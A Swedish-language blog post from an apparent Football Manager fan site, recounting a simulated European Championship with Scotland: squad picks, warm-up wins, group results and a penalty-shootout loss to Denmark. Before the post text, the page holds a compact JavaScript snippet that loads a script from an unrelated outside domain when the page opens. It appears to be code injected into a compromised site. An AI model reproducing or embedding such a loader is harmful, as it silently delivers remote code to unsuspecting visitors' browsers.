;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start of the week – The Tartan Army – FMSweden
Meny Stäng

Start of the week – The Tartan Army

Sist ut av mina landslagsuppdrag är Skottland.

Truppen

Nu med nerladdat mod så fick jag ta ut 26 spelare som på riktigt och detta är en trupp som direkt kändes roligare och sexigare än Wales trupp. Mycket kvalitet på dem allra flesta positionerna. Robertson och Tierney är kaptener.

Genrepen
Vi började EM-uppladdningen genom att spela borta mot Slovakien. En match vi dominerade och rättvist vann med 2-1. I andra matchen mötte vi Litauen hemma och det var total slakt. Efter 45 minuter hade Andy Robertson gjort hattrick men vi var inte klara där utan matchen slutade hela 5-0 och stämningen i truppen var minst sagt god inför Europamästerskapet.

Taktik

Två starka genrep ledde mig fram till denna elva i premiären.

Gruppen

En tuff grupp och en grupp jag verkligen ser fram emot under det riktiga Europamästerskapet. Känns helt vidöppet enligt mig.

Gruppspelet
Skottland – Kroatien 2–1
Rätt jämnt och tillknäppt. I den 30:e minuten tog Scott McTominay rött kort efter en vansinnigt dum tackling på mittplan. Vi lyckas stå emot ganska bra och gör till och med 1-0 efter 55 minuter genom Andy Robertson. Kroatien svarade dock snabbt på det med 1-1, 4 minuter senare. Lång Kroatien dominans ledde till en snabb kontring från firma Tierney/Robertson och inbytte Oli McBurnie satte dit 2-1 som blev slutresultatet. En man mindre i 60 minuter och seger i premiären!

Skottland – England 0-1
Derby! Tillknäppt och tyst. En klassaktion av Kane och 1-0 England.

Skottland – Tjeckien 1-1 
Vår sämsta match i gruppspelet och förtjänade egentligen att förlora men David Marshall spikade igen totalt. 1-0 av Kevin Nisbet i minut 82’ blev 1-1 efter en dråplig situation i minut 92’


Vidare som tvåa i gruppen och i åttondelsfinalen väntade Danmark.

Slutspel
Åttondelsfinal: Skottland – Danmark 1-2 efter straffar
David Marshall är helt otrolig i denna match och länge såg det ut som att han skulle bli stor matchhjälte men i den 92:a minuten satte Poulsen dit 1-1 på nick efter en hörna. I förlängningen hände ingenting och straffar väntade. Ryan Jack blir stor syndabock när han blir den enda som missar en straff och uttåget var ett faktum.

Riktigt riktigt trist uttåg. Kände att vi kunde nå längre än såhär och jävligt surt att vi åker ut på det sättet vi gör.

Bästa spelare: Andy Robertson 1+2

Please wait...

Liknande Inlägg

Lämna ett svar